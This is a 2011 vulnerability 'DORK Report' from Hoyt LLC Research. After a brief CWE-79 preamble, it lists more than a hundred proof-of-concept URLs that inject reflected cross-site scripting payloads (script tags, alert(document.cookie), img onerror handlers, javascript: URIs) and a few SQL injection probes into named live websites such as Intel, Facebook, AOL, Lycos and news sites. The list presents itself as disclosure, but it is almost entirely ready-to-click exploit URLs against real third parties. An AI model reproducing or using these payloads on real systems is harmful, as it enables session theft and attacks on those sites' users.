The DORK Report for 2-28-2011


.	AUTHOR: Hoyt LLC Research
.	Keywords: Cross Site Scripting, XSS, SQL Injection, Proof of Concept, URI, Click to Execute, CWE-79, CAPEC-86, Unforgivable Vulnerabilities
.	Last Updated: March 6, 2011 1358 GMT
.	Description: Spreadsheet of Unforgivable Vulnerabilities in URI Format
.	HOW TO: Use a Proxy and Repeater tool such as ZAPROXY!
.	CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
.	CAPEC-86: Embedding Script (XSS ) in HTTP Headers
.	Description Summary - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
.	The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser.
.
.
.	http://recs.richrelevance.com/rrserver/p13n_generated.js?a=5387d7af823640a7&ts=1298696265845&cis=\|72384&p=1a6ddbd&re=True&cts=http://www5.jcpenney.com/jcp/&pt=\|ensemble_page.content1&s=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ctp=\|0:cmOrigId%25253D1a6ddbd%252526cmTypeFlag%25253DRichRel%252526cmCatID%25253Dhomepage%25257C723842c3c1';alert(1)//3dbbc323ad9&pref=http://www4.jcpenney.com/jcp/XGN.aspx%3Fn%3D4294953363%26catsel%3D4294953363--comforters%2B%2B%2Bbedspreads%26deptid%3D70750%26pcatid%3D70750%26catid%3D72384%26cattyp%3DSAL%26dep%3DBEDDING%26pcat%3DBEDDING%26cat%3DSale%26refpagename%3DDefault%25252Easpx%26refdeptid%3D%26refcatid%3D%26cmAMS_T%3DT1%26cmAMS_C%3DC3%26CmCatId%3Dhomepage&l=1
.	http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22?6060c'-alert(document.cookie)-'2045e17825d=1
.	https://secure.avangate.com/order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5/6e9f0%22%3E%3Cscript%3Ealert(1)%3C/script%3E516e15aff28be73
.	http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22?d9ef9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd38641bfde=1
.	http://trc.taboolasyndication.com/dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc%3Cscript%3Ealert(document.cookie)%3C/script%3E1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http://burp/show/11
.	http://managedq.com/search.php?q=o/65f22%22;alert(1)//e219070d6ebbama
.	http://ll-appserver.veoh.com/styles/veoh.css?version=AFrontend.5.5.4.103888ebc%3Cscript%3Ealert(1)%3C/script%3E9e1cf63d45e
.	https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228%22%3E%3C/script%3EHoyt.LLC.Research%3Cscript%3Ealert(1)%3C/script%3ESays.API.XSS.is.DANGEROUS
.	http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1


.	http://ads.adap.tv/beacons?callback=jsonp1296766389465b6987%3Cscript%3Ealert(1)%3C/script%3E1178017b98e
.	http://abc.go.com/vp2/d/deeplinkbf5ec--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edb1ccd44039
.	http://ads.adap.tv/beacons?callback=jsonp1296766389465b6987%3Cscript%3Ealert(1)%3C/script%3E1178017b98e
.	https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_c746BCC88-A14E-D718-6B04-E73FD9A18396_kA0AC6416-93F6-3A61-2E2C-20DE2B6F6380
.	https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440
.	http://www.openforum.com/?54350'-alert(document.cookie)-'b64566be317=1
.	http://hurricane.accuweather.com/hurricane/index.asp?722b7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1b639a6b3=1
.	http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E15e0db13ad7/
.	http://lansner.ocregister.com/category969aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21e3c1a89f6/outlooks/eyeball-11/
.	http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6bccede39c1
.	http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eebc82fd6548=1
.	http://static.wetpaint.com/staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-e3910%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Eb4e740388f2&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=/
.	http://media.match.com/cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb0bf9d965be
.	http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/
.	http://www.au2m8.com/v/?ps=26&cw=26263692aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E395e61b488b&pID=11909&skinName=light&t=685356&pr=www.kledy.de/bookmarks.php&psource=www.kledy.de/bookmarks.php&poR=http://burp/show/34&poS=http://www.kledy.de/bookmarks.php%3F18fe2%2522%253E%253Cscript%253Ealert(document.cookie)%253C/script%253Eef67307aec5%3D1&jr=1&jr=2&jr=3&jr=4&jr=5&jr=6
.	http://www.netvouz.com/?e032a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1b86ab2e0f6=1
.	http://www.slackbooks.com/essentialknee'
.	http://www.splunk.com/5d79e--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E01e99964339/
.	http://www.slackbooks.com/orthopedics'
.	http://www.baysideeyes.com.au/favicon.ico'


.	http://inside.intel.com/LOPFeedMashup?ON=runMashup&SN=LOPMASHUP09API.XSS%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.IS.CERTAIN.API.XSS.is.DANGEROUS&STARTINDEX=1&COUNT=3
.	http://pubads.g.doubleclick.net/gampad/ads?correlator=1296956995929&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BOVAw,&cids=VxBQkM,&pstok=b8HFZCHCK-UKDgoKCIOqThDDhIXiFRAACgA&client=ca-pub-5783553522579509&slotname=Tile2_RightCol488f2%3Cscript%3Ealert(1)%3C/script%3Ec924c785a0a&page_slots=CenterCol_Tile1,Tile1_RightCol,Tile2_RightCol&cust_params=Site%3DHA&cookie=ID%3D9c79886a0efcbf70:T%3D1296942810:S%3DALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig&ga_vid=1785005893.1296942825&ga_sid=1296956996&ga_hid=1372920090&ga_fc=true&url=http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http://burp/show/1&lmt=1296978611&dt=1296957011025&cc=11&biw=969&bih=996&ifi=3&adk=1414079277&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103
.	http://newsroom.intel.com/community/intel_newsroom/?iid=gg_about+intel_pressroom97bc3%253Cscript%253Ealert(1)%253C/script%253E00808251755
.	http://newsroom.intel.com/render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi3c39a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf3c9d8300&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3
.	http://www.invisionpower.com/index.php?79b73'43785%3Cscript%3Ealert(document.cookie)%3C/script%3E8587ea4b601
.	http://track.roiservice.com/track/track.aspx?ROIID=936138107000019e5d61';alert(1)//83d5529551f
.	http://ar.voicefive.com/bmx3/broker.pli?pid=da39f516a098b3de)(sn=*&PRAd=264255445&AR_C=185637072
.	http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com/ad/ck/14302-119028-23636-2%3Fmpt%3D[CACHEBUSTER]&mpjs=puma.vizu.com/cdn/00/00/14/09/tracking_only.js%3Fadid%3Demm;siteid%3Downeriq;75f94%22;alert(1)//6b802c89842&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click;h%3Dv8/3aa5/3/0/*/o;235018855;0-0;0;41185174;2321-160/600;40066933/40084720/1;u%3Dsid_;~sscs%3D%3f&placementid=14302119028236362&
.	http://mm.chitika.net/minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http://burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00'&loc=205,1872&output=simplejs&callback=ch_ad_render_search
.	http://px.owneriq.net/j/?pt=oiqrmba4892%22;alert(1)//f99faf2810f&t=m\|%22owneriq%22&s=site
.	https://splunk.webex.com/mw0305l69e60%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ecf07a33562d/mywebex/default.do
.	http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/136?cid=RSS
.	http://www.sitesearch.omniture.com/contact/form_support.htm?first_name=&last_name=&email=&account=21416%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E426ca979e1e
.	http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6a009cb502=1
.	http://www.jazdtech.com/techdirect/?decf1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E28f30fa12ca=1
.	http://www.kledy.co.uk/?b6885%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E58b3310da99=1
.	http://www.kledy.es/?bc891%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d09625540c=1
.	http://www.kledy.eu/?f0d30%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E31ed3e6c6d3=1
.	http://www.kledy.us/?88099%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E31a8b6ec06f=1
.	http://www.klivio.com/?34aa6%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Eceac919ade3=1


.	http://mm.chitika.net/minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http://burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs621be%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac55a9221bd&callback=ch_ad_render_search
.	http://www.codero.com/dedicated-server-hosting95e50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E537998c927c/
.	http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
.	http://quotes.forexyard.com/iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.cssbdb85%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec67b70ca19&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129
.	http://www.shoppinga.de/?bd2d5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3b5e976e9e=1
.	http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
.	http://www.peppernews.eu/?d7d65%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ef6336f06cd4=1
.	http://www.spiele365.com/?24997%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E8c1d99e1e7c=1
.	http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ee05d79885fa=1
.	http://a.ligatus.com/timeout.php?ids=9470d8918%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHoyt.LLC.Research.says.API.XSS.is.a.DANGEROUS.Vulnerability
.	http://adv-chart-app.app.aol.com/pfsg/sdr?symbols=dji:$indu&service=chartdetail&f=xml&dtype=configurable&tf=d,1&gran=i&fids=i,h,l,o,c,v,pc&q=1&backfill=1&echouri=1&tm=1&dt=1&tr=1&echo=determineTDIsByResponsead839%3Ca%20xmlns:a%3d'http://www.w3.org/1999/xhtml'%3E%3Ca:body%20onload%3d'alert(document.cookie)'/%3E%3C/a%3Ed81adcd233
.	http://money.aol.com/reflector/setCookie?cb=54f8b%3Cscript%3Ealert(document.cookie)%3C/script%3E5358b4f3ab0&
.	http://smallbusiness.aol.com/?998a2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9cd08062e59=1
.	http://sports.aol.com/favicon.ico87de0%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed5d06ef2b0a
.	http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
.	http://www.aisledash.com/?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=1
.	http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingc010a%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E4971c98bf8c/1567480
.	http://www.autoblog.com/?b6c46%22-alert(document.cookie)-%228a56f02ab0f=1
.	http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
.	http://www.bloglines.com/sub/__FEED__c24e6%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E05cab84ecba


.	http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
.	http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
.	http://www.dailyfinance.com/?3054c%22-alert(document.cookie)-%22c83105876b0=1
.	http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
.	http://www.engadget.com/tag/xxxe42f9%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e9716d68035d
.	http://www.fanhouse.com/?44b80%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eabb790fc786=1
.	http://www.kitchendaily.com/chefs/?bc258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E960b49903a6=1
.	http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1
.	http://www.mapquesthelp.com/app/answers/detail/a_id/949/?1ce58%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3ed392e1c04=1
.	http://www.mydaily.com/?9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558=1
.	http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
.	http://www.parentdish.com/?b3bee%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E92fa7b5cfb0=1
.	http://www.pawnation.com/?e9b1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E496daf65c5b=1
.	http://www.politicsdaily.com/?12b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4f92425601e=1
.	http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
.	http://www.shelterpop.com/?e8bed%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E427cdd79cfd=1
.	http://www.slashfood.com/?56532%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E375a63e9c9a=1
.	http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
.	http://www.coveritlive.com/index2.php?option=com_altcaster&task=viewaltcast&altcast_code=aa0042dfaf49020%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E13bc1ee4c0f&ipod=y&rand=
.	http://www.shmoop.com/news/2010/09/21/famous-quotes-translated-lolcat5b944%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E83a75121f32/


.	http://www.gamestats.com/?d0025%22-alert(document.cookie)-%22f21ee463262=1
.	http://www.giga.de/?2284b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E732b2e7ef39=1
.	http://www.gamespy.com/?c6f81%22-alert(document.cookie)-%2276c1646d5d9=1
.	http://www.collegehumor.com/cutecollegegirl?bca04'-alert(document.cookie)-'dce0a2be640=1
.	http://www.cheatscodesguides.com/?ebbc4%22-alert(document.cookie)-%221b555473641=1
.	http://www.battlefieldheroes.com/frontpage/landingPage?6597c%22%3E%3Cscript%3Ealert(1)%3C/script%3Efaa6a926d2d=1
.	http://theberry.com/?a0ff9%22%3E%3Cscript%3Ealert(1)%3C/script%3E759d555dcd1=1
.	http://thebrigade.com/?d5967%22%3E%3Cscript%3Ealert(1)%3C/script%3E49e627f48fe=1
.	http://thethrottle.com/?a53db%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb17cf9c91cc=1
.	http://www.myspace.com/search/People?q='&5c4c0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c3a5fc1be3=1
.	http://www.sportspickle.com/?a7e69%22-alert(document.cookie)-%2283e8c03d4a5=1
.	http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?52cbb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8f1dc1cc99c=1
.	http://www.wovencube.com/?%00cd5ad'%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E55453d4dd28=1
.	http://www.dorkly.com/?f2e8e%22-alert(document.cookie)-%22fc32afa1300=1
.	http://www.cracked.com/blog/8-real-photographs-that-prove-hell-exists-earth503ed%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ecec9204c68/
.	http://www.chmedia.com/?5772b%22-alert(document.cookie)-%2203f27c6a15b=1
.	http://www.wifesbank.com/?433f2%22-alert(document.cookie)-%22bc1327073bc=1
.	http://pglb.buzzfed.com/34870/e7f1f9e9d5da9e2039cbfbc9a17b9a63?callback=BF_PARTNER.gate_response9e6f3%3Cscript%3Ealert(document.cookie)%3C/script%3E037dfcfaabb&cb=2545
.	http://faqs.ign.com/?7be29%22-alert(document.cookie)-%2260680a1de34=1
.	https://registration.lycos.com/login.php/131eb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7bbbd5c508a


.	https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9))
.	http://openx-bid.dotomi.com/openx/bid?campaign=Target&msize=18&pp=99999&algov=1&keyv=1&cbust=1297090236936pxx&cback=window[%22KhHan%22]CAPEC-86%3Cscript%3Ealert(document.cookie)%3C/script%3EHoyt.LLC.Research.says.API.XSS.is.a.DANGEROUS.VULNERABILITY&est=d60bba1517ae40aa7dd6458e71a52d53&apiv=2&gender=&pub_id=468991918&pub_cat_id=19&bc=1&hf=1&refd=http://www.mail.lycos.com/%3Futm_source%3Dlycoshome%26utm_campaign%3Dhome_mail%26utm_medium%3Dleft_nav
.	http://dealnews.com/lwe6b00%3Cscript%3Ealert(document.cookie)%3C/script%3E1cb99b4afc7/artclick.html?2,432062,1403664
.	http://info.lycos.com/tos.php/963e7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1ea902f3967
.	http://jobs.lycos.be/?utm_source=lycosjobs%00'&utm_campaign=jobs_flags&utm_medium=footer
.	http://ads.newtention.net/ads?rt=2&et=1e1cd6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee6c0c919bce&i=9978&se=p&cs=4778&ts=botaKgv,bgvagRooiRy&cr=%one[[reredirect_plain]]
.	http://blog.foreignpolicy.com/nodefab98%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E56da63999ee/647276
.	http://azstarnet.com/news1fe82%22-alert(document.cookie)-%22790c9c6bc5a/national/article_4b942e8b-c2bc-5dd5-9a5e-e98d7f07c87e.html
.	http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15';alert(document.cookie)//6bd50a0af01
.	https://services.entireweb.com/affiliate/?md=user86d09%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7ff69a93d58&ma=forgot
.	http://www.bendbulletin.com/apps/pbcs.dll/article?AID=/20110207/NEWS0107/102070324/101388daa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E43df6844472&nav_category=
.	http://www.denverpost.com/commentedb8191%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9972c42f9b3/ci_17314551
.	https://secure.www.denverpost.com/favicon.ico?fd5a9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec464c1aee0d=1
.	http://api.facebook.com/restserver.php?v=1.0f5bc5%3Cimg%20src%3da%20onerror%3dalert(1)%3EHOYT.LLC.RESEARCH.says.API.XSS.is.DANGEROUS&method=links.getStats&urls=[%22http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15'%253balert(document.cookie)//6bd50a0af01%22]&format=json&callback=fb_sharepro_render
.	https://secure.www.denverpost.com/registration/?rPage='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&url=http://www.denverpost.com/commentedb8191%2522%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E9972c42f9b3/ci_17314551&eRightsSessionExpired=true
.	https://www.denverpostcustomercare.com/CSSearch.asp?PageName=MissedPaper.asp&Hdr=Redeliver+Papera0d70%22%3E%3Cimg+src%3Da+onerror%3Dalert(document.cookie)%3E7f6c5d55e1f&Login=True
.	https://secure.www.denverpost.com/favicon.ico61804%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab2ed74f4ce
.	http://splunk.webex.com/mw0305lc9de6%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb7206d28565/mywebex/default.do
.	http://nydn.mwap.at/index.php380fd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6a9dade539
.	http://events.nydailynews.com/venues?6084b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E217c5ac4234=1


.	http://finance.nydailynews.com/nydailynews/markets?9e859'-alert(document.cookie)-'5fa27ba37c2=1
.	https://webport2.nydailynews.com:8443/WebPortWebapp/login.do?method=loadLoginf4635--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed655a71844388ac98&newsletterID=nydn
.	http://ads.sitescout.com/disp?pid=296252F&gid=214&sid=d1fc5';alert(document.cookie)//83858b9ce8f&xurl=
.	http://nydailynews.stats.com/fb/scoreboard.asp?bf8b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed88cfac7d8f=1
.	http://www.ietf.org/favicon.icoe3c69%3Cscript%3Ealert(document.cookie)%3C/script%3E96dcf030f1d
.	http://clickhere.sitescout.com/disp?pid=3B7E5E6&rw=1&cm=http://clickserv.sitescout.com/clk/2e9c01b9df7e4c28/1-7477/0%3Fr%3D&sid=747747770%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9c4e763f7c5&xurl=http://www.nydailynews.com/favicon.ico96572';alert(1)//66a9a4c656b&rand=55128161
.	http://www.sixapart.com/movabletypee3b0b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E032da27d596/
.	http://odb.outbrain.com/utils/get?url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fnational%2F2011%2F02%2F08%2F2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html&srcUrl=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fnational%2Findex_rss.xml&callback=outbrain_rater.returnedOdbData(${json},0)&settings=true&recs=true&widgetJSId=NAd85af<img%20src%3da%20onerror%3dalert(1)>3672471291e&key=AYQHSUWJ8576&idx=0&version=34100&ref=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&apv=false&rand=0.7583931158296764&sig=6bwzNPW4
.	http://www.vanityfair.com/online/daily/2010/1216403956%20or%201%3d1--%20/the-10-most-valiant-snow-rescue-tweets-from-cory-booker-twitters-mayor.html
.	http://gawker.com/index.php/92178%2522%253e%253cscript%253ealert%25280x58%2529%253c%252fscript%253ec07b92378fc
.	http://tags.gizmodo.com/index.php/6d649%2522%253e%253cscript%253ealert%2528666%2529%253c%252fscript%253e95ac2b8d964
.	http://tags.gizmodo.com/index.php?pipeJsonP=httptagsgizmodocomindexphppipeJsonPopajaxrightbarurlpageType0postPos1allowPopular1sessionId1&op=ajax_rightbar&url=&pageType=0&postPos=-1&allowPopular=1&sessionId=16edff%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecc5bf1b2a1c
.	http://tags.gizmodo.com/index.php/4e4a8%2522%253balert%25281%2529%252f%252faf1f2275768
.	http://tags.gawker.com/index.php/6f66a%2522%253e%253cscript%253ealert%2528666%2529%253c%252fscript%253e586f0850ae5
.	http://tags.gawker.com/index.php?pipeJsonP=httptagsgawkercomindexphppipeJsonPopajaxrightbarurld81e82522253b1e9f9b879f02Fvendor2Feyeblaster2FaddineyeV2html242426ncu3D2424http3A2Faddoubleclicknet2FclickpageType0postPos1allowPopular1sessionId1&op=ajax_rightbar&url=d81e8%2522%253b1e9f9b879f0/vendor/eyeblaster/addineyeV2.html$$%26ncu%3D$$http:/ad.doubleclick.net/click866e4%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f8acb51769&pageType=0&postPos=-1&allowPopular=1&sessionId=1
.	http://tags.deadspin.com/index.php/721c8%2522%253e%253cscript%253ealert%2528666%2529%253c%252fscript%253e3d756dc5cf8
.	http://beta.gawker.com/d81e8%22;1e9f9b879f0/vendor/eyeblaster/addineyeV2.html$$&ncu=$$http:/ad.doubleclick.net/click
.	http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1933967&PluID=0&w=300&h=250&ord=4551480&ucm=true&ifl=$$http://beta.gawker.com/assets/vendor/eyeblaster/addineyeV2.html$$1ea76%22;alert(1)//a55160bc981&ncu=$$http://ad.doubleclick.net/click;h%3Dv8/3aa8/3/0/*/v;234355190;0-0;0;14043613;4307-300/250;39314318/39332105/1;;~okv%3D;ptile%3D1;sz%3D300x250;origin%3Dgawker;visited%3Dgizmodofront;visited%3Ddeadspinfront;visited%3Dgawkerfront;~aopt%3D2/0/31/0;~sscs%3D%3f$$&z=0
.	http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle83f21--%3E%3Cscript%3Ealert(1)%3C/script%3E5e236d41c26&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true
.	http://gizmodo.com/searchec4f1%22-alert(1)-%225f2ecc8d2ec


.	http://hyperion.gawker.com/ad/82x50?site_id=7&page_type=frontpage&size=82x50&random=23561433&tags[]=blinditems&tags[]=gossip&tags[]=tweetd&tags[]=tweetg&tags[]=fb&jsonp=jsonp1297203168147cf79a%3Cscript%3Ealert(1)%3C/script%3E85c73b074fd
.	http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
.	https://secure.watchmouse.com/en/website_monitoring_features.php?c5d13%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec8784763d6c=1
.	http://www.vogel-nest.de/favicon.icoa00b2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E62e569e965
.	http://xhtml.co.il/he/page-700/jQuery?72f1f'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb977444cfbf=1
.	http://xhtml.co.il/ru/page-1013/jQuery.browser?2baaa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E50c1d38299f=1
.	http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
.	http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx?3541f'style%3d'x:expression(alert(1))'7b381ee316b=1
.	http://cafe.naver.com/javamaker.cafe?iframe_url=javascript:alert(document.cookie)//7c86965c
